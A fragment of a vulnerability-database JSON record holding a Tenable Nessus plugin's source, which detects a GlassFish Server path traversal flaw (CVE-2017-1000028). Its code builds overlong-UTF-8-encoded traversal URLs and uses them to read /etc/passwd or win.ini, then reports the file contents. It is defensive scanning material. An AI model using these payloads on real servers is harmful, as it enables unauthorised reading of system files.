"NONE", "modified": "2021-08-19T12:32:04", "rev": 2}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' 
and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity 
: SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "Contact to vendor for patch options.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "4.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": null, "vulnerabilityPublicationDate": "2017-07-17T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}]}
Glassfish Server Open Source Edition 3.1.2.2 Vulnerabilities
Source: https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL